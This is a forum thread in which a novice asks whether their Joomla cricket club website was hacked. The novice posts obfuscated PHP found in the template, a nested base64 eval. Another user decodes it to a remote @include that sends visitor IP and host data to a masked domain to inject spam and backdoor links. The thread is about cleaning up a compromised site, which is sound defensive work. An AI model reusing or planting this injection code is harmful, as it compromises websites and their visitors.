| Fordy |
| (new user) |
| Sat Apr 12 2008 10:45 PM |
Has my website been hacked?
|
I have put together a basic Joomla website for my local cricket club which is my first attempt at a website and on checking the page source for any of my pages there appears to be some code I don't recognise and don't know where it is coming from. If you go to the Carlton Cricket Club Homepage and look at the page source (I use Firefox so View>Page source) there is some code right at the end, below my footer. I won't post it here as some of them are offensive links. Slightly different examples seem to be on all the pages on the site but nothing seems to be displayed to the users on the front end. Has my site been hacked and do you know how I can remove this offensive code and how I can stop it from happening again? Any help gratefully received as I am a novice.
TheFatControlleR
|
| (Forum Admin) |
| Sun Apr 13 2008 11:00 AM |
|
Re: Has my website been hacked?
|
I don't see anything untoward...
| heres_johnny |
| (regular) |
| Sun Apr 13 2008 11:53 AM |
|
|
Re: Has my website been hacked?
|
looks ok when i logged on
| Fordy |
| (new user) |
| Sun Apr 13 2008 10:13 PM |
|
Re: Has my website been hacked?
|
Sorry, I found this in the early hours of today after much searching:
Code:
<?echoeval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJm
WkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBoVjBad2IxbHJUbTlo
Vm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNSEJvVmpCYWQySXhiSEpVYlRsb1ZtMTRXbFpI
TVRSVU1rWnpVMjB4V0dFeVVsaFpWekZLWlZaV2RHVkZlRkpOU0VKdlZtcENZV1F5U1hoaVNFcFZZbFJz
YjFadE1UUlhiRnBJVFZSU1ZVMXJXbnBWTWpCNFYwZEZlVlZzYUZwV2VrWkxXbFphVjJSSFZrWmxSa3BP
VTBWS1ZWWnNaSGRUTURWR1RWWmtZVkpzV2xWWlYzaExWREZhZEU1VlRsUldiSEI2VjFod1YxWkhTbFpq
Um14WVlXczFjbGRXV2t0WFIwWkdWR3hXYVZkR1JYZFdSM2hXVGxaa1JrNVdhRk5pUjJoVVdWUk9RMDFz
V1hoYVJFSm9UVVJXU1ZaR2FITlZNa3BJWVVaQ1YwMUdXak5aTVZwM1ZqRldjMXBIZEU1V00yZDNWa1ph
YTFJeVJYbFNXSEJoVWtaYWFGWnNaRzlTUm14WFdrVjBXRlpzV25oV01uaFhWa1pPUmxOcmFGZFNiRnBY
Vkd4YVMxSnJOVmRXYkVwcFYwZG9WbFpYTVRCV01ERnpXa1prV0dKVWJGTlpXSEJ6VmpGc2NtRkZUbFZO
Vld3MlZsZDRhMWRzV2taWGJXaFhVa1ZhYUZWc1drdGpNVkp6Vkcxc1UwMXNSalpXYkdONFRVWlplRlpZ
YUZSaWEzQndWV3RXWVZaV1duRlRhbEpvVW0xNGVGVXlkSGRpUjBwSFUyNW9WbFl6YUVoV2JYTjRVMGRS
ZW1GR1drNWliRXBaVjFkd1IxbFdXWGhhU0VwaFVtdHdjRlp0TlVOV2JGcFlaVVpPYWsxV2NGaFdNalZM
VmxkS2NtTkdRbUZXYkZwNldrUkdUbVZHVm5WalJrWldUVWQ0TTFWNlJsTmxiRUpVVTFoQ1RGWklUVGxK
YVd0d1QzYzlQU0lwS1RzPSIpKTs="));?>which I didn't recognise in my template's code so I deleted it and it appears to have got rid of the issue for the time being. Any idea what it is, where it might have come from and whether there is anything I can do to stop it from coming back?
| spoziuk |
| (regular) |
| Thu Apr 17 2008 08:41 PM |
Re: Has my website been hacked?
|
Thats a hijack, after 10 base64 decodes it results in
Code:
@include("http://**********.info/links/148.txt?ip=".$REMOTE_ADDR."&host=".$HTTP_HOST);
(link removed for safety)
Seems like some kind of spam list, lots of porn and viagra links and also a few adware and backdoor site links, if you see it again, remove it asap. also may be a good idea to set your CHMOD privlidges to the files.
| Fordy |
| (new user) |
| Sun Apr 20 2008 03:19 PM |
|
Re: Has my website been hacked?
|
Thanks for your help.